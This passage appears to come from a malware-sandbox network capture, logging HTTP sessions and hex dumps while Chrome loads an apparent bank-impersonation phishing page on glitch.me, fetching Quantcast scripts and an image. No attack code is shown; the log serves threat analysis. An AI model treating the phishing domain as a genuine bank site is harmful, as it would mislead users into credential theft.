                                                                                                                          2024-10-13 16:20:43 UTC8000INData Raw: 6c a2 aa e4 00 00 00 00 00 07 ef 1e 4c 98 b2 57 26 3b 4d 32 52 62 d4 bd 66 62 d5 b4 4e b1 31 31 e8 98 06 de f0 cf ab 27 aa fa 27 8c e6 72 4c 7d 2b 2e 3f 67 bd 8a f6 44 67 c5 33 4c 93 a7 ab bd 35 ef 44 7b 92 d2 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1 f5 bf 49 ec 7a b3 a6 37 dc 1e f3 4a d7 75 4f d0 e6 d3 59 c5 9a bf 2b 1e 48 f4 7c db 44 6b 1e b8 d6 3d 60 c3 bc b7 15 be e2 79 3d d7 19 bf c5 38 77 9b 3c b6 c3 9f 1c fa ad 49 d2 74 f7 63 dc 9f 5c 22 bc 88 00 00 00 00 00 00 00 00 00 36 e7 84 fd 41 3c f7 87 7c 1f 21 7b 4d f3 fd 1a bb 7d c5 ad 3a da 72 ed a6 70 de d6 f7 ed 38 fb df 1b 48 96 80 00 00 00 00 16 b4 56 26 d6 9d 22 3b 66 67 d1 10 08 4f 51 f8 cf e1 bf 03 17 ae e7 99 c5 b9 dc d3
                                                                                                                          Data Ascii: lLW&;M2RbfbN11''rL}+.?gDg3L5D{%Iz7JuOY+H|Dk=`y=8w<Itc\"6A<|!{M}:rp8HV&";fgOQ
                                                                                                                          2024-10-13 16:20:43 UTC8000INData Raw: dd f7 1f f6 b6 1f ab 6e 12 91 96 51 40 01 a0 7c a6 ff 00 de 3a 9f f3 36 5f b7 9d 61 5a 21 50 06 42 f3 15 f7 a9 c8 ff 00 33 b5 fd 45 52 ac 56 68 00 03 63 f8 01 f7 47 c0 ff 00 4b fa ee 66 91 61 00 00 00 a0 bc d7 f2 b1 5d 97 4f f1 35 98 99 cb 93 3e ef 24 6b db 1e ce b5 c7 4e cf 7f da 5b f0 25 58 ce 68 00 03 51 f9 59 d8 ce 2e 87 e4 77 76 a4 d6 77 3c 8d eb 5b 4f e3 53 16 1c 71 13 1f be b5 a1 61 57 32 a2 0d e3 7f dd 5f 50 7f 33 8f f5 f8 c1 8b d9 50 00 58 7e 00 7d ee 70 3f d2 fe a5 99 46 c6 54 01 9c 7c c6 f8 a3 93 3e ea fd 17 c4 67 d3 6d 82 62 79 9c d4 99 d6 f9 3d 35 db eb 1d 9d da 7a 6f fb ae cf c5 94 aa a1 10 00 07 4b 84 e9 ce 7b 9d dc ce d7 86 e3 f3 f2 19 eb a7 7e bb 7c 76 bf 72 2d 3a 44 de 62 34 ac 7b f6 ec 51 60 f1 7e 5b 7c 4d de e3 ef e7 c1 b4 e3 7d ca ee
                                                                                                                          Data Ascii: nQ@|:6_aZ!PB3ERVhcGKfa]O5>$kN[%XhQY.wvw<[OSqaW2_P3PX~}p?FT|>gmby=5zoK{~|vr-:Db4{Q`~[|M}
                                                                                                                          2024-10-13 16:20:43 UTC8000INData Raw: b2 33 52 3b f4 88 8f 76 97 94 c5 d5 47 d4 9e 0f f8 89 d3 d6 bd b7 bc 36 6c db 7a eb 3f 4b da 47 d2 71 77 6b db 36 99 c7 de b5 23 f3 e2 01 0c 40 00 00 00 00 00 00 00 00 7a 36 3c 7e ff 00 90 dd 53 69 b0 db 65 dd ee b2 7f 27 b7 c1 4b 64 c9 6d 3b 7b 29 48 99 95 16 3f 4b f9 78 f1 13 9a 9a 64 de 6d e9 c3 6c ed a4 ce 5d ed b4 cb dd d7 b7 bb 82 9d eb f7 bd eb f7 7e 13 05 c1 d2 3e 5b 7a 1f 87 9a 67 e5 ed 93 9d de 57 49 fd 3f e8 b6 d1 31 3a c4 c6 0a 4c cc fb 93 17 bd a2 7d c5 c4 5a bb 5d a6 d7 69 b7 a6 db 6b 86 9b 7d be 28 ee e3 c3 8a b1 4a 56 23 d5 5a d6 22 22 01 f5 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 de 7f c1 ff 00 0e ba 83 97 dc 72 fc bf 11 f4 9e 47 75 dd f6 f9 fe 91 ba c7 de ee 52 31 d7 e4 e3 cb 4a c6 95 ac 47 64 03 9f fd c0 78 47 ff 00 01 ff 00
                                                                                                                          Data Ascii: 3R;vG6lz?KGqwk6#@z6<~Sie'Kdm;{)H?Kxdml]~>[zgWI?1:L}Z]ik}(JV#Z""rGuR1JGdxG
                                                                                                                          2024-10-13 16:20:43 UTC2530INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                          Data Ascii:


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.449756184.28.90.27443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:43 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-10-13 16:20:44 UTC467INHTTP/1.1 200 OK
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Server: ECAcc (lpl/EF70)
                                                                                                                          X-CID: 11
                                                                                                                          X-Ms-ApiVersion: Distribute 1.2
                                                                                                                          X-Ms-Region: prod-neu-z1
                                                                                                                          Cache-Control: public, max-age=174292
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:43 GMT
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.44975891.228.74.1594432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:43 UTC546OUTGET /quant.js HTTP/1.1
                                                                                                                          Host: secure.quantserve.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:44 UTC295INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:43 GMT
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Content-Length: 23930
                                                                                                                          Connection: close
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Cache-Control: private, max-age=604800
                                                                                                                          Etag: "HP/dXILNCv8vRT01LqWQOg=="
                                                                                                                          Expires: Sun, 20 Oct 2024 16:20:43 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          2024-10-13 16:20:44 UTC16089INData Raw: 2f 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 38 2d 32 30 32 33 2c 20 51 75 61 6e 74 63 61 73 74 20 43 6f 72 70 2e 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 71 75 61 6e 74 63 61 73 74 2e 63 6f 6d 2f 6c 65 67 61 6c 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 22 71 63 53 65 73 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 65 3d 72 28 29 3b 72 65 74 75 72 6e 22 78 78 78 78 78 78 78 78 2d 78 78 78 78 2d 34 78 78 78 2d 79 78 78 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 28 65 2b 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 25 31 36 7c 30 3b
                                                                                                                          Data Ascii: /* Copyright (c) 2008-2023, Quantcast Corp. https://www.quantcast.com/legal/license */!function(){"use strict";var e="qcSes";function t(){var e=r();return"xxxxxxxx-xxxx-4xxx-yxxx-xxxxxxxxxxxx".replace(/[xy]/g,(function(t){var n=(e+16*Math.random())%16|0;
                                                                                                                          2024-10-13 16:20:44 UTC7841INData Raw: 29 7d 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 3d 5b 5d 3b 69 66 28 21 28 6a 65 3e 30 29 29 7b 66 6f 72 28 65 20 69 6e 20 54 28 29 2c 44 65 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 44 65 2c 65 29 26 26 44 65 5b 65 5d 26 26 28 74 3d 44 65 5b 65 5d 2c 6e 2e 70 75 73 68 28 74 29 2c 64 65 6c 65 74 65 20 44 65 5b 65 5d 29 3b 69 66 28 31 3d 3d 6e 2e 6c 65 6e 67 74 68 26 26 77 28 6e 5b 30 5d 29 2c 6e 2e 6c 65 6e 67 74 68 3e 31 29 66 6f 72 28 65 3d 30 3b 65 3c 6e 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 77 28 6e 5b 65 5d 29 7d 7d 2c 65 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 3d 5b 5d 3b 66 6f 72 28 6e 3d 4f 65 2e 73 6c 69 63 65 28 30 29
                                                                                                                          Data Ascii: )},K=function(){var e,t,n=[];if(!(je>0)){for(e in T(),De)Object.prototype.hasOwnProperty.call(De,e)&&De[e]&&(t=De[e],n.push(t),delete De[e]);if(1==n.length&&w(n[0]),n.length>1)for(e=0;e<n.length;e++)w(n[e])}},ee=function(){var e,t,n,r=[];for(n=Oe.slice(0)


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449760162.214.111.334432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:44 UTC398OUTGET /wp-content/uploads/2021/07/entrevista-adriana-arismendi.jpeg HTTP/1.1
                                                                                                                          Host: mtmarketing.co
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:44 UTC209INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:43 GMT
                                                                                                                          Server: Apache
                                                                                                                          Last-Modified: Tue, 27 Jul 2021 13:06:21 GMT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Content-Length: 648805
                                                                                                                          Connection: close
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          2024-10-13 16:20:44 UTC7983INData Raw: ff d8 ff e1 00 8b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 0f 00 02 00 00 00 08 00 00 00 56 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 5e 01 1b 00 05 00 00 00 01 00 00 00 66 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 15 00 00 00 6e 00 00 00 00 42 65 46 75 6e 6b 79 00 00 00 01 2c 00 00 00 01 00 00 01 2c 00 00 00 01 42 65 46 75 6e 6b 79 20 50 68 6f 74 6f 20 45 64 69 74 6f 72 00 ff e0 00 10 4a 46 49 46 00 01 01 01 01 2c 01 2c 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01
                                                                                                                          Data Ascii: ExifMM*V^f(1nBeFunky,,BeFunky Photo EditorJFIF,,CC
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: e8 35 d6 3f 33 44 10 27 c2 dd 2e 3e 4a 22 46 a4 6d bf c3 7a 2b 1a 1c 0d cc 88 d2 4a 11 1f 10 27 cc 1d 60 d1 5e 90 36 8d 3a 51 50 98 19 80 12 34 91 3d 3e 6b 42 34 20 69 a1 f5 a2 85 c4 b8 c9 8f 21 0a 12 08 30 68 a8 a9 22 41 1f 2f 7d 11 44 50 47 4d c0 ff 00 b5 31 cb c8 cd 58 e6 92 64 46 9f 54 fb e6 a3 31 1e 20 08 1c f7 e8 36 e5 f0 f8 f2 ab 0b 4b 62 62 e9 24 eb 1d 20 47 aa 89 49 29 e9 1c ba fc 7d 3d 6a d4 54 90 0e e0 1f 7d 11 46 53 19 8e 9e 5e 5a 88 f7 45 14 79 1f 04 99 80 26 e4 dc 74 fd e1 50 75 df 5f 7e b4 49 2e 01 a0 90 45 ce d3 e9 d4 a8 54 92 0c e9 1a e9 ef d4 7e 46 8a f6 88 69 06 f2 41 e7 b1 e6 bc ee e3 64 ab fd b3 e2 ed 3f fa 67 c7 f9 8f fe aa dd f9 d7 c4 dd ab ff 00 4a 7b 4b fe df e3 1f f1 1c 4a fa fb b3 3f e8 e7 67 ff 00 d8 9c 2b ff 00 01 87 5b 63 22
                                                                                                                          Data Ascii: 5?3D'.>J"Fmz+J'`^6:QP4=>kB4 i!0h"A/}DPGM1XdFT1 6Kbb$ GI)}=jT}FS^ZEy&tPu_~I.ET~FiAd?gJ{KJ?g+[c"
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: 37 b4 fb 7b 1c 2d 16 e8 6d ab 1b ab 9b 82 eb 97 b0 13 99 4a ce a4 6a 09 5f 5f c3 5d a7 0a e3 79 44 1a 9a 8e 7e 04 45 ed 6f 91 9d c6 7e 1f 19 b1 31 3a 5f e1 71 e8 0e 90 76 5e a9 f6 75 ed 8d d8 e7 1d 58 b0 b6 71 cc 35 2e bc da 48 ee f2 48 2a 20 6f de 91 ac ce dd 39 83 5d 5d 1e 35 25 a7 3d c4 6f ad bc 26 c6 04 c8 bc c2 d8 fb 7b 36 fc e0 47 31 ca 40 f0 b7 4d 4a e7 bc 2b 8a 38 5b 1f 5a 5c c3 b1 b0 b4 2a 0a 72 10 04 1d a2 09 89 fd 37 ad ad 3e 32 44 90 ed 63 7f 3b 45 fa 6b 78 37 57 7b 6b ba e2 c2 22 76 3e 11 e5 7e 67 4b ac dd e6 22 96 14 6d 9b b3 66 e5 94 1f 0d ea e7 3b 89 da 4e b1 a0 13 d3 7d 74 a9 9d c6 5d 96 4b a2 64 eb e7 ce 23 ec 01 75 4f 6d dd 6c ba 07 df 58 8f 8f 5b ac 15 e7 14 70 de 12 ca ee 71 4c 5f f8 78 4a 54 a5 01 97 2a 42 44 9d c8 eb 04 69 fa 56 be
                                                                                                                          Data Ascii: 7{-mJj__]yD~Eo~1:_qv^uXq5.HH* o9]]5%=o&{6G1@MJ+8[Z\*r7>2Dc;Ekx7W{k"v>~gK"mf;N}t]Kd#uOmlX[pqL_xJT*BDiV
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 89 44 4a 22 51 12 88 94 44 a2 25 11 28 8b d5 07 52 44 65 1a 10 67 e1 ef d7 e5 5f a0 0b e1 7d c8 dc 6a ac ca 54 a2 76 80 4c 4f 4f 87 eb 54 20 1d 42 79 03 e3 3f 22 14 75 02 bd 84 09 93 1a 7c d2 a8 40 22 fa 78 c2 95 06 86 46 f2 3d 36 a9 29 eb 6d 22 de e5 42 5b b9 16 33 ae e1 5f b6 01 12 9d c0 9d 3a e9 53 00 49 1c a6 fe 1f d6 14 8c d7 cb e6 15 cd 4a 33 02 07 f0 8f 0e 5e ba ac b6 cc 0f bf 0f 72 b8 f7 a4 ab 9c 0d 09 e6 3e b5 72 9d a0 40 3b f8 aa c0 cc a9 29 20 19 90 7e be fa 2b e3 7f 98
                                                                                                                          Data Ascii: (DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(DJ"QD%(RDeg_}jTvLOOT By?"u|@"xF=6)m"B[3_:SIJ3^r>r@;) ~+
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: d7 d6 e2 65 db 12 62 3e a0 1b 46 d3 d0 f8 2d 6e 27 0e 60 92 23 2d ef 6d 00 26 00 f8 f3 d2 ea 7e e8 36 e8 5b 88 24 18 d3 de 66 4e e0 72 d7 e7 bd 68 eb d6 35 a7 29 83 f0 d6 c6 ff 00 7e e1 76 17 13 ec 9c d2 d3 70 45 ba 03 7b 9d 01 8f 89 ea b7 f7 06 71 c6 2b c0 7c 43 63 8e e0 57 2b b5 b9 b4 5b 2b 0e b5 f8 80 43 ad b8 a4 e8 46 be 1d a4 ea 39 99 ad 37 10 e1 0d e2 58 5a 94 2b b0 d4 6b a4 e9 3a 48 9b 8f b1 6f 1f 4c ec ff 00 69 ce 0e b5 27 07 16 c0 00 dc 4e a2 f0 76 37 37 bf 86 ff 00 62 5f 65 bf da 29 86 76 a3 c2 76 7c 0d c7 78 96 6c 61 0f b3 67 6c 6f ee 72 28 b3 6c 95 db 8c a8 52 96 4a 48 ee f6 d2 23 96 ff 00 2a 7e 25 76 24 e1 2a bd ed a6 0d 3c a5 d9 9a d1 0d 98 31 31 ad e7 c4 6e 57 d6 7d 84 ed b9 ad 45 99 6a 1d 40 37 e5 3e ef 8a f7 59 0a 45 a3 b6 98 85 92 83 d6
                                                                                                                          Data Ascii: eb>F-n'`#-m&~6[$fNrh5)~vpE{q+|CcW+[+CF97XZ+k:HoLi'Nv77b_e)vv|xlaglor(lRJH#*~%v$*<11nW}Ej@7>YE
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: 43 d0 21 73 9d a9 25 33 aa 39 7b e3 5f a7 a5 56 06 b1 7e 6a c8 1c 87 a2 66 51 e7 fa 7e 55 7b 6a 3d ba 1f 04 0d 02 e0 2b fb 47 12 d1 0f 2a 7c 23 2f 9c 9d 39 03 e7 26 3d d1 59 cd 14 6a d1 77 b5 6e 6d cd c4 93 7e 9a db 49 f8 de 17 ba b3 5c 05 37 41 91 7d 3e 77 d7 43 3b eb 75 dd df 63 0f 6a 2c 7f d9 cf b4 ac 1f 89 ad 2f 2e 9b b3 b6 b9 53 8e 36 d9 75 41 59 dd 69 43 c2 15 97 64 9f e9 f7 73 07 c9 fb 71 d9 aa 5c 66 85 53 49 ad f6 8d 69 6b 73 01 37 9b c0 12 4e f3 cd 7b 07 61 38 e5 7c 1d 6a 2c ab 50 c1 20 9b db 58 bc db 6d a0 59 7d d9 fb 34 fb 42 60 5e d1 3d 9e e0 fc 51 85 5f b2 ee 3b 69 87 da 24 b7 f7 84 2d ee fd d4 15 2c 16 86 55 c8 20 08 dc 18 af 84 fb 77 d9 43 42 b6 21 be ca 0b 5c f0 4e 58 e7 a6 f7 b6 96 93 3d 17 db 9d 86 ed 40 7b 29 34 54 17 cb a9 b7 98 27 c7
                                                                                                                          Data Ascii: C!s%39{_V~jfQ~U{j=+G*|#/9&=Yjwnm~I\7A}>wC;ucj,/.S6uAYiCdsq\fSIiks7N{a8|j,P XmY}4B`^=Q_;i$-,U wCB!\NX=@{)4T'
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: 79 d4 d3 66 50 9d dd 1a 86 43 5a e6 b1 ad 8b b4 92 1d 3f cc 77 82 76 88 d2 f7 2b 85 c7 b8 b2 ab a9 d4 69 ae 6a 10 3f bd b6 59 0d 82 04 08 81 de 1b 9b 44 5a 3c 2a be e1 4c 2f 87 7b 42 7f 0a 38 a3 d8 5d e2 6f 1b 16 ee 62 0d b9 83 61 56 40 2c 94 a6 ed e7 50 ab d6 09 09 40 69 20 32 96 d9 28 75 fb a7 15 2e 1e 83 21 ad 86 c8 32 54 24 38 64 2d ef 3c 17 5c 02 5c 00 91 20 19 d2 da ad 1e 13 d9 e1 f1 ed cc fa cc aa 2a 13 4e ab 89 14 a9 35 ae be 62 1a e9 63 a2 44 0b 58 41 30 57 b9 fe ce 4f 62 98 4f 0b b2 f2 f0 bc 36 fe ca ff 00 b8 7a f6 eb 86 6f 57 74 2e 6d 4a 02 42 93 8d d8 95 d8 e2 6b 2b 42 9f 36 98 b3 97 19 d2 a5 a9 0b 2a 01 15 87 82 c3 7b 07 56 a6 fc 3b f0 c2 5a 58 1b 17 63 4d 86 70 5c d3 9a fd db 10 0c 93 a1 5d f7 15 ae dc 5d 0c 3b c6 26 93 ea 35 a4 31 c5 c5 ec
                                                                                                                          Data Ascii: yfPCZ?wv+ij?YDZ<*L/{B8]obaV@,P@i 2(u.!2T$8d-<\\ *N5bcDXA0WObO6zoWt.mJBk+B6*{V;ZXcMp\]];&51
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c e3 a1 f4 fa d1 13 38 e8 7d 3e b4 44 ce 3a 1f 4f ad 11 33 8e 87 d3 eb 44 4c
                                                                                                                          Data Ascii: DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL8}>D:O3DL
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: d4 ab c3 f0 af aa fa 4c 6c e2 1a 5d 85 c2 0a 2e 76 47 31 a5 c1 8f aa 4e 61 14 fd 98 68 13 33 98 03 c0 7c 45 c4 1d 87 e0 d8 83 cb 67 b3 ae 25 c7 b1 fb 0c 50 a9 0e 3f 85 f0 f5 f2 af 6d ca fb f6 af ac ee b8 2b 1d e3 2b 6c 2e e8 34 d3 2e de e2 18 16 29 82 a4 dc db bc 31 36 19 b9 b9 b9 b3 6b 39 9c 1f 0b 85 a0 e6 3b 13 4e 60 89 3e d5 cd 64 83 72 d6 1a 65 d3 a1 69 05 b1 b4 2c 43 c4 31 b5 71 4c af 54 51 2c 74 97 06 1c 39 73 5c 3f 4b 5b 52 b8 27 24 81 39 43 48 89 2b ae dc 60 8e 1c c7 b1 b7 5d c4 b0 c3 82 b2 d7 f1 1b 9b cc 44 f6 7b 8c e0 e4 84 b6 a7 d8 bb 53 f8 4f 0d 63 01 e4 24 ae de 2f ae b8 9e fb 33 0c a3 bc ba b4 87 2e 05 83 84 e0 c8 06 9f 13 a4 1a f2 01 a6 18 28 8c d1 9a 5a 09 12 e9 11 04 83 97 31 3a 15 8f 5f 1d 55 cf ab 38 0a 66 1a 1f ed e9 3c 62 1c d6 7e 97
                                                                                                                          Data Ascii: Ll].vG1Nah3|Eg%P?m++l.4.)16k9;N`>drei,C1qLTQ,t9s\?K[R'$9CH+`]D{SOc$/3.(Z1:_U8f<b~
                                                                                                                          2024-10-13 16:20:45 UTC8000INData Raw: 3b 01 5f 0c 5a 09 ab 48 b0 18 b8 93 b7 96 fb 7a ae af b2 78 81 85 e2 34 6b 13 01 95 41 3e 9f 2b 9f 25 f7 61 f6 78 7b 5b e1 be d0 dd 94 e0 56 ae df 32 e6 3d c3 78 5b 57 18 c2 1b 58 53 b9 9c 53 69 1d ea b3 4a 81 ef 46 e0 11 a6 fc be 0f ed ef 65 5f 86 c7 63 69 e4 24 31 ce 12 45 ed a1 91 b5 a3 91 bf 30 57 dd 1d 8b ed 2b 1f 85 c3 45 40 6c 34 3f 4d 6c 46 9d 3a 2f 4e 0a c5 ed b5 bd c3 d0 dd ad d1 29 b4 20 68 55 bf 85 27 41 1d 49 33 af 32 27 e6 ae 3d c2 1d 46 ab fb b1 06 77 8f 0f da 79 af a3 b8 07 17 65 6a 6c ef 49 22 0e 86 d7 b9 f9 5a 22 c1 14 a5 5b 9f e1 e7 5e e4 ce 63 b9 9d 20 fb a2 b9 6a 00 d1 a9 00 5e c0 fc a3 a5 c5 b9 69 7d 7a 7a d1 55 85 c0 cc 83 63 e7 e3 e5 bd ba 18 a7 94 49 8e 93 5d 0d 2c 5c b0 08 93 71 d4 78 dc 69 cd 73 f5 70 91 53 37 51 33 ef b9 07 d3
                                                                                                                          Data Ascii: ;_ZHzx4kA>+%ax{[V2=x[WXSSiJFe_ci$1E0W+E@l4?MlF:/N) hU'AI32'=FwyejlI"Z"[^c j^i}zzUcI],\qxispS7Q3


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.44976218.66.102.154432316C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:20:44 UTC561OUTGET /rules-p-d5x2uDVHd7ALE.js HTTP/1.1
                                                                                                                          Host: rules.quantcount.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                          Referer: http://bancolombia-seguridad-co.glitch.me/
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-10-13 16:20:45 UTC637INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/javascript
                                                                                                                          Content-Length: 160
                                                                                                                          Connection: close
                                                                                                                          Date: Sun, 13 Oct 2024 16:20:46 GMT
                                                                                                                          Last-Modified: Thu, 13 Oct 2022 22:55:53 GMT
                                                                                                                          ETag: "ceee564f54e512a948f918e2710eab6e"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Cache-Control: max-age=3600
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-methods: GET
